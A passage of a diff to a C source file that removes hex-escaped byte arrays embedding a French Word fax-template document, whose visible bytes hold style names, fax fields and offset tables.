-"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18" -"\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01" -"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03" -"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05" -"\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06" -"\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66" -"\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6" -"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6" 
-"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6" -"\xf6\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76" -"\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08" -"\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06" -"\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35" -"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35" -"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35" -"\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24" -"\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68" -"\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2" -"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d" -"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d" -"\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02" -"\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23" -"\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03" -"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03" -"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03" -"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05" -"\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x14\x00\x18\x00\x12\x00\x01\x00\x9c\x00\x0f\x00\x03\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x38\x00\x00\x40\xf1\xff\x02\x00\x38\x00" -"\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x4e\x00\x6f\x00" -"\x72\x00\x6d\x00\x61\x00\x6c\x00\x00\x00\x02\x00\x00\x00\x10\x00" -"\x5f\x48\x01\x04\x6d\x48\x0c\x04\x73\x48\x0c\x04\x74\x48\x0c\x04" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x3a\x00\x41\x40\xf2\xff\xa1\x00\x3a\x00\x0c\x01\x00\x00" -"\x00\x00\x00\x00\x00\x00\x11\x00\x50\x00\x6f\x00\x6c\x00\x69\x00" -"\x63\x00\x65\x00\x20\x00\x70\x00\x61\x00\x72\x00\x20\x00\x64\x00" -"\xe9\x00\x66\x00\x61\x00\x75\x00\x74\x00\x00\x00\x00\x00\x5a\x00" -"\x69\x40\xf3\xff\xb3\x00\x5a\x00\x0c\x01\x00\x00\x00\x00\x00\x00" -"\x00\x00\x0e\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x61\x00" -"\x75\x00\x20\x00\x4e\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6c\x00" -"\x00\x00\x20\x00\x3a\x56\x0b\x00\x17\xf6\x03\x00\x00\x34\xd6\x06" -"\x00\x01\x05\x03\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x6c\x00\x61" -"\xf6\x03\x00\x00\x02\x00\x0b\x00\x00\x00\x32\x00\x6b\x00\xf4\xff" -"\xc1\x00\x32\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00" -"\x41\x00\x75\x00\x63\x00\x75\x00\x6e\x00\x65\x00\x20\x00\x6c\x00" -"\x69\x00\x73\x00\x74\x00\x65\x00\x00\x00\x02\x00\x0c\x00\x00\x00" -"\x00\x00\x2e\x00\xfe\x4f\x01\x00\xf2\x00\x2e\x00\x0c\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x09\x00\x44\x00\x66\x00\x78\x00\x4e\x00" -"\x75\x00\x6d\x00\x46\x00\x61\x00\x78\x00\x00\x00\x02\x00\x0f\x00" -"\x00\x00\x2c\x00\xfe\x4f\x01\x00\x02\x01\x2c\x00\x0c\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x08\x00\x44\x00\x66\x00\x78\x00\x48\x00" -"\x65\x00\x75\x00\x72\x00\x65\x00\x00\x00\x02\x00\x10\x00\x00\x00" -"\x2a\x00\xfe\x4f\x01\x00\x12\x01\x2a\x00\x0c\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x07\x00\x44\x00\x66\x00\x78\x00\x44\x00\x61\x00" -"\x74\x00\x65\x00\x00\x00\x02\x00\x11\x00\x00\x00\x3a\x00\xfe\x4f" -"\x01\x00\x22\x01\x3a\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0f\x00\x44\x00\x66\x00\x78\x00\x44\x00\x65\x00\x73\x00\x74\x00" 
-"\x69\x00\x6e\x00\x61\x00\x74\x00\x61\x00\x69\x00\x72\x00\x65\x00" -"\x00\x00\x02\x00\x12\x00\x00\x00\x30\x00\xfe\x4f\x01\x00\x32\x01" -; -char file_part6[]= -"\x30\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x44\x00" -"\x66\x00\x78\x00\x53\x00\x6f\x00\x63\x00\x69\x00\xe9\x00\x74\x00" -"\xe9\x00\x00\x00\x02\x00\x13\x00\x00\x00\x2c\x00\xfe\x4f\x01\x00" -"\x42\x01\x2c\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00" -"\x44\x00\x66\x00\x78\x00\x4f\x00\x62\x00\x6a\x00\x65\x00\x74\x00" -"\x00\x00\x02\x00\x14\x00\x00\x00\x36\x00\x1f\x40\x01\x00\x52\x01" -"\x36\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x45\x00" -"\x6e\x00\x2d\x00\x74\x00\xea\x00\x74\x00\x65\x00\x00\x00\x0d\x00" -"\x15\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00\x00\x00" -"\x40\x00\x20\x40\x01\x00\x62\x01\x40\x00\x0c\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x0c\x00\x50\x00\x69\x00\x65\x00\x64\x00\x20\x00" -"\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00\x67\x00\x65\x00\x00\x00" -"\x0d\x00\x16\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00" -"\x00\x00\x34\x00\x29\x40\xa2\x00\x71\x01\x34\x00\x0c\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x0e\x00\x4e\x00\x75\x00\x6d\x00\xe9\x00" -"\x72\x00\x6f\x00\x20\x00\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00" -"\x67\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00" -"\x07\x00\x00\x02\x01\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00" -"\x2d\x00\x00\x00\x6e\x00\x00\x00\x81\x00\x00\x00\xab\x02\x00\x00" -"\xf4\x02\x00\x00\xf5\x02\x00\x00\x11\x03\x00\x00\x32\x03\x00\x00" -"\x33\x03\x00\x00\x66\x03\x00\x00\x20\x04\x00\x00\xd3\x04\x00\x00" -"\x08\x05\x00\x00\x62\x05\x00\x00\x63\x05\x00\x00\x8a\x05\x00\x00" -"\x18\x06\x00\x00\xbc\x06\x00\x00\xbd\x06\x00\x00\xf6\x06\x00\x00" -"\x97\x08\x00\x00\x98\x08\x00\x00\xb5\x08\x00\x00\x39\x0a\x00\x00" -"\x3a\x0a\x00\x00\x46\x0a\x00\x00\xbd\x0a\x00\x00\xff\x0a\x00\x00" -"\xcd\x0c\x00\x00\xe9\x0e\x00\x00\x99\x0f\x00\x00\xb8\x11\x00\x00" -"\x12\x12\x00\x00\x2f\x13\x00\x00\x7e\x13\x00\x00\x7f\x13\x00\x00" 
-"\x91\x13\x00\x00\x10\x14\x00\x00\x11\x14\x00\x00\x15\x14\x00\x00" -"\x5d\x15\x00\x00\x5e\x15\x00\x00\x68\x15\x00\x00\x20\x16\x00\x00" -"\x01\x17\x00\x00\x62\x17\x00\x00\x5e\x18\x00\x00\x5f\x18\x00\x00" -"\xa1\x18\x00\x00\x4e\x19\x00\x00\x71\x1b\x00\x00\xd9\x1b\x00\x00" -"\x63\x1c\x00\x00\x0d\x1e\x00\x00\x3b\x1e\x00\x00\x0d\x20\x00\x00" -"\xde\x20\x00\x00\x57\x21\x00\x00\xbc\x21\x00\x00\x7b\x22\x00\x00" -"\x40\x23\x00\x00\xdf\x23\x00\x00\x69\x23\x00\x00\x87\x23\x00\x00" -"\x88\x23\x00\x00\x9c\x23\x00\x00\x13\x24\x00\x00\x41\x24\x00\x00" -"\x42\x24\x00\x00\x5a\x24\x00\x00\x20\x25\x00\x00\x65\x25\x00\x00" -"\x82\x25\x00\x00\x30\x26\x00\x00\x54\x26\x00\x00\x15\x27\x00\x00" -"\x60\x27\x00\x00\xf0\x27\x00\x00\x90\x28\x00\x00\x47\x29\x00\x00" -"\x48\x29\x00\x00\x33\x2a\x00\x00\x34\x2a\x00\x00\x30\x2b\x00\x00" -"\x23\x2c\x00\x00\x24\x2c\x00\x00\xae\x2c\x00\x00\xc8\x2c\x00\x00" -"\xc9\x2c\x00\x00\x33\x2d\x00\x00\x34\x2d\x00\x00\xee\x2e\x00\x00" -"\x4f\x30\x00\x00\x9c\x30\x00\x00\xe3\x30\x00\x00\x62\x31\x00\x00" -"\x63\x31\x00\x00\x29\x32\x00\x00\xda\x33\x00\x00\xdb\x33\x00\x00" -"\xe7\x33\x00\x00\x76\x34\x00\x00\x77\x34\x00\x00\x86\x34\x00\x00" -"\x97\x35\x00\x00\x19\x36\x00\x00\xca\x36\x00\x00\xe4\x37\x00\x00" -"\x06\x38\x00\x00\x07\x38\x00\x00\x08\x38\x00\x00\x09\x38\x00\x00" -"\x0a\x38\x00\x00\x19\x38\x00\x00\x1a\x38\x00\x00\x2a\x39\x00\x00" -"\x6b\x39\x00\x00\x6c\x39\x00\x00\x74\x39\x00\x00\x75\x39\x00\x00" -"\x81\x39\x00\x00\xe5\x39\x00\x00\xe6\x39\x00\x00\xf0\x39\x00\x00" -"\x1c\x3a\x00\x00\x4a\x3a\x00\x00\x4b\x3a\x00\x00\x67\x3a\x00\x00" -"\xa0\x3a\x00\x00\xa1\x3a\x00\x00\xac\x3a\x00\x00\x51\x3b\x00\x00" -"\x52\x3b\x00\x00\x76\x3b\x00\x00\xe2\x3b\x00\x00\xe3\x3b\x00\x00" -"\xf6\x3b\x00\x00\xc7\x3c\x00\x00\xc8\x3c\x00\x00\xe0\x3c\x00\x00" -"\x66\x3d\x00\x00\x67\x3d\x00\x00\x76\x3d\x00\x00\x46\x3e\x00\x00" -"\x98\x3e\x00\x00\xbb\x3e\x00\x00\x9a\x3f\x00\x00\x9b\x3f\x00\x00" -"\xa4\x3f\x00\x00\xc7\x3f\x00\x00\xe7\x3f\x00\x00\x4b\x41\x00\x00" 
-"\x4c\x41\x00\x00\x62\x41\x00\x00\x6a\x42\x00\x00\x06\x43\x00\x00" -"\xaf\x43\x00\x00\x21\x44\x00\x00\xef\x44\x00\x00\xf0\x44\x00\x00" -"\x17\x45\x00\x00\x18\x45\x00\x00\x29\x45\x00\x00\x26\x46\x00\x00" -"\xfd\x46\x00\x00\xfe\x46\x00\x00\x0c\x47\x00\x00\x6f\x47\x00\x00" -"\xe3\x47\x00\x00\xe4\x47\x00\x00\xee\x47\x00\x00\xd6\x48\x00\x00" -"\xd7\x48\x00\x00\xe4\x48\x00\x00\x3d\x4a\x00\x00\x3e\x4a\x00\x00" -"\x4f\x4a\x00\x00\x86\x4b\x00\x00\x87\x4b\x00\x00\x98\x4b\x00\x00" -"\x54\x4c\x00\x00\x55\x4c\x00\x00\x5d\x4c\x00\x00\xf6\x4d\x00\x00" -"\xf7\x4d\x00\x00\x0f\x4e\x00\x00\x19\x4f\x00\x00\x1a\x4f\x00\x00" -"\x31\x4f\x00\x00\x32\x4f\x00\x00\x41\x50\x00\x00\x42\x50\x00\x00" -"\x4f\x50\x00\x00\x6e\x50\x00\x00\x6f\x50\x00\x00\x7d\x50\x00\x00" -"\xca\x50\x00\x00\xde\x50\x00\x00\xef\x50\x00\x00\xf0\x50\x00\x00" -"\xfb\x50\x00\x00\x1b\x51\x00\x00\x50\x51\x00\x00\x77\x51\x00\x00" -"\x86\x51\x00\x00\x9d\x51\x00\x00\x9e\x51\x00\x00\xa9\x51\x00\x00" -"\xdc\x51\x00\x00\xff\x51\x00\x00\x00\x52\x00\x00\x07\x52\x00\x00" -"\x51\x52\x00\x00\x52\x52\x00\x00\x59\x52\x00\x00\x9a\x52\x00\x00" -"\x9b\x52\x00\x00\xa3\x52\x00\x00\xd4\x52\x00\x00\xfc\x52\x00\x00" -"\xfd\x52\x00\x00\x06\x53\x00\x00\x42\x53\x00\x00\xab\x53\x00\x00" -"\xac\x53\x00\x00\xb4\x53\x00\x00\xe7\x53\x00\x00\x27\x54\x00\x00" -"\x28\x54\x00\x00\x31\x54\x00\x00\x6f\x54\x00\x00\xa1\x54\x00\x00" -"\xa2\x54\x00\x00\xaf\x54\x00\x00\xf7\x54\x00\x00\xf8\x54\x00\x00" -"\x04\x55\x00\x00\x40\x55\x00\x00\x41\x55\x00\x00\x48\x55\x00\x00" -"\x84\x55\x00\x00\x85\x55\x00\x00\x92\x55\x00\x00\xa7\x55\x00\x00" -"\xa8\x55\x00\x00\xb9\x55\x00\x00\x22\x56\x00\x00\x23\x56\x00\x00" -"\x3e\x56\x00\x00\x66\x56\x00\x00\x97\x56\x00\x00\xc0\x56\x00\x00" -"\xd8\x56\x00\x00\xeb\x56\x00\x00\xfc\x56\x00\x00\x24\x57\x00\x00" -"\x25\x57\x00\x00\x40\x57\x00\x00\x68\x57\x00\x00\x98\x57\x00\x00" -"\xc1\x57\x00\x00\xde\x57\x00\x00\xf1\x57\x00\x00\x19\x58\x00\x00" -"\x1a\x58\x00\x00\xb8\x58\x00\x00\xb9\x58\x00\x00\xd0\x58\x00\x00" 
-"\xf4\x58\x00\x00\x5a\x59\x00\x00\x5b\x59\x00\x00\x85\x59\x00\x00" -"\xad\x59\x00\x00\x21\x5a\x00\x00\x22\x5a\x00\x00\x2a\x5a\x00\x00" -"\xed\x5a\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x5a\x5b\x00\x00" -"\x45\x5c\x00\x00\x46\x5c\x00\x00\x4d\x5c\x00\x00\x8f\x5c\x00\x00" -"\x90\x5c\x00\x00\xa9\x5c\x00\x00\x6d\x5d\x00\x00\x6e\x5d\x00\x00" -"\x9c\x5d\x00\x00\x18\x5e\x00\x00\x19\x5e\x00\x00\x39\x5e\x00\x00" -"\x79\x5e\x00\x00\x7a\x5e\x00\x00\x86\x5e\x00\x00\xf0\x5e\x00\x00" -"\xf1\x5e\x00\x00\xfc\x5e\x00\x00\xa1\x5f\x00\x00\xa2\x5f\x00\x00" -"\xb0\x5f\x00\x00\x7f\x60\x00\x00\x80\x60\x00\x00\x8b\x60\x00\x00" -"\xd2\x60\x00\x00\xd3\x60\x00\x00\xed\x60\x00\x00\x07\x61\x00\x00" -"\xfd\x61\x00\x00\x35\x62\x00\x00\x36\x62\x00\x00\x41\x62\x00\x00" -"\xc9\x62\x00\x00\xca\x62\x00\x00\xd4\x62\x00\x00\x07\x63\x00\x00" -"\x08\x63\x00\x00\x14\x63\x00\x00\x44\x63\x00\x00\x45\x63\x00\x00" -"\x5d\x63\x00\x00\x8f\x63\x00\x00\xe2\x63\x00\x00\xe3\x63\x00\x00" -"\xed\x63\x00\x00\x2b\x65\x00\x00\x2c\x65\x00\x00\x3f\x65\x00\x00" -"\x9e\x65\x00\x00\x9f\x65\x00\x00\xac\x65\x00\x00\xce\x65\x00\x00" -"\xcf\x65\x00\x00\xe2\x65\x00\x00\x1e\x66\x00\x00\x1f\x66\x00\x00" -"\x2d\x66\x00\x00\x15\x67\x00\x00\x16\x67\x00\x00\x17\x67\x00\x00" -"\x18\x67\x00\x00\x19\x67\x00\x00\x1a\x67\x00\x00\x1b\x67\x00\x00" -"\x1c\x67\x00\x00\x1d\x67\x00\x00\x1e\x67\x00\x00\x1f\x67\x00\x00" -"\x20\x67\x00\x00\x21\x67\x00\x00\x22\x67\x00\x00\x23\x67\x00\x00" -"\x24\x67\x00\x00\x25\x67\x00\x00\x26\x67\x00\x00\x27\x67\x00\x00" -"\x28\x67\x00\x00\x29\x67\x00\x00\x2a\x67\x00\x00\x2b\x67\x00\x00" -"\x2c\x67\x00\x00\x2d\x67\x00\x00\x2e\x67\x00\x00\x2f\x67\x00\x00" -"\x30\x67\x00\x00\x31\x67\x00\x00\x32\x67\x00\x00\x33\x67\x00\x00" -"\x34\x67\x00\x00\x35\x67\x00\x00\x36\x67\x00\x00\x37\x67\x00\x00" -"\x38\x67\x00\x00\x39\x67\x00\x00\x3a\x67\x00\x00\x3b\x67\x00\x00" -"\x51\x67\x00\x00\xa6\x67\x00\x00\xa7\x67\x00\x00\xaa\x67\x00\x00" -"\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67\x00\x00\xd8\x67\x00\x00" 
-"\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67\x00\x00\xe5\x67\x00\x00" -"\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68\x00\x00\x11\x68\x00\x00" -"\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68\x00\x00\x25\x68\x00\x00" -"\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68\x00\x00\x49\x68\x00\x00" -"\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68\x00\x00\x6e\x68\x00\x00" -"\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68\x00\x00\x89\x68\x00\x00" -"\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68\x00\x00\xc3\x68\x00\x00" -"\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68\x00\x00\xd9\x68\x00\x00" -"\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68\x00\x00\x01\x69\x00\x00" -"\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69\x00\x00\x13\x69\x00\x00" -"\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69\x00\x00\x31\x69\x00\x00" -"\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69\x00\x00\x55\x69\x00\x00" -"\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69\x00\x00\x63\x69\x00\x00" -"\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69\x00\x00\x8c\x69\x00\x00" -"\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69\x00\x00\xa3\x69\x00\x00" -"\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69\x00\x00\xce\x69\x00\x00" -"\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69\x00\x00\xe4\x69\x00\x00" -"\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69\x00\x00\x00\x6a\x00\x00" -"\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00" -"\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a\x00\x00\x3f\x6a\x00\x00" -"\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a\x00\x00\x67\x6a\x00\x00" -"\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a\x00\x00\x75\x6a\x00\x00" -"\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a\x00\x00\x9e\x6a\x00\x00" -"\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a\x00\x00\xb6\x6a\x00\x00" -"\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a\x00\x00\xe2\x6a\x00\x00" -"\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a\x00\x00\x03\x6b\x00\x00" -"\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b\x00\x00\x20\x6b\x00\x00" -"\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b\x00\x00\x48\x6b\x00\x00" -"\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b\x00\x00\x55\x6b\x00\x00" 
-"\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b\x00\x00\x7c\x6b\x00\x00" -"\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b\x00\x00\x90\x6b\x00\x00" -"\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b\x00\x00\xaa\x6b\x00\x00" -"\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b\x00\x00\xcd\x6b\x00\x00" -"\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b\x00\x00\xe9\x6b\x00\x00" -"\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c\x00\x00\x11\x6c\x00\x00" -"\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c\x00\x00\x20\x6c\x00\x00" -"\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c\x00\x00\x4b\x6c\x00\x00" -"\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c\x00\x00\x66\x6c\x00\x00" -"\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c\x00\x00\x7f\x6c\x00\x00" -"\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c\x00\x00\xa1\x6c\x00\x00" -"\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c\x00\x00\xb7\x6c\x00\x00" -"\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c\x00\x00\xe7\x6c\x00\x00" -"\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c\x00\x00\xf8\x6c\x00\x00" -"\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d\x00\x00\x20\x6d\x00\x00" -"\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d\x00\x00\x33\x6d\x00\x00" -"\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d\x00\x00\x59\x6d\x00\x00" -"\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d\x00\x00\x7a\x6d\x00\x00" -"\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d\x00\x00\x8e\x6d\x00\x00" -"\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d\x00\x00\xbb\x6d\x00\x00" -"\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d\x00\x00\xc7\x6d\x00\x00" -"\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d\x00\x00\xfe\x6d\x00\x00" -"\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e\x00\x00\x19\x6e\x00\x00" -"\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e\x00\x00\x37\x6e\x00\x00" -"\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e\x00\x00\x57\x6e\x00\x00" -"\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e\x00\x00\x68\x6e\x00\x00" -"\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e\x00\x00\x90\x6e\x00\x00" -"\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e\x00\x00\x9e\x6e\x00\x00" -"\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e\x00\x00\xc9\x6e\x00\x00" 
